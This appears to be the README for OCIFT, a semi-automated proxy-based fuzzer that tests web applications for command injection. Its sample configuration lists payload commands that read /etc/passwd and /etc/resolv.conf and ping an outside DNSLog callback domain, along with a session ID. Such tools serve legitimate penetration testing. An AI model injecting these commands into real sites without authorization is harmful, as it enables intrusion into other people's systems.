一个半自动化命令注入漏洞Fuzz工具(One Semi-automation command injection vulnerability Fuzz tool)
一个半自动化命令注入漏洞Fuzz工具(One Semi-automation command injection vulnerability Fuzz tool)简写为:OCIFT
这是一种半自动化的黑盒测试工具,它可以帮助渗透测试人员或代码审计人员在愉快的上网的同时,深度挖掘目标应用系统存在的命令注入漏洞。
基于Tornado的实现一个代理服务器,解析GET/POST请求提取Fuzz点,带入payload进行Fuzz测试。
* |____run.py 主程序入口 |____dnslog.py DNSLog SDK |____fuzz.conf 配置文件 |____fuzz.py Fuzz线程 |____make_payload.py Payload生成器 |____readme.md 说明文档
[initconfig]
black_hosts =.gov,localhost,127.0.0.1,google,gstatic,cnzz.com,doubleclick,police,mil.cn,gov.cn,gov.com
url_ext_black =.ico,.flv,.css,.jpg,.png,.jpeg,.gif,.pdf,.ss3,.txt,.rar,.zip,.avi,.mp4,.swf,.wmi,.exe,.mpeg
white_site =qunar
timeout =10
my_cloudeye =ano1qu2j.xfkxfk.com
checkkeys =110586256,/bin/bash,nameserver,IPv4,Windows IP
base_command =cat /etc/resolv.conf,echo 110586256,cat /etc/passwd,ipconfig,ping CommandInj.{my_cloudeye},echo 110586256<nul
fuzz_count =20
commix_payload_type = False
dnslog_sessionid =q6wva2e3skg79vkdegra2bygft0d1
custom_domain =a2fta2j
Logfile =rce_success_results.txt
pip install tornado pip install requests
python run.py 8089
如下图: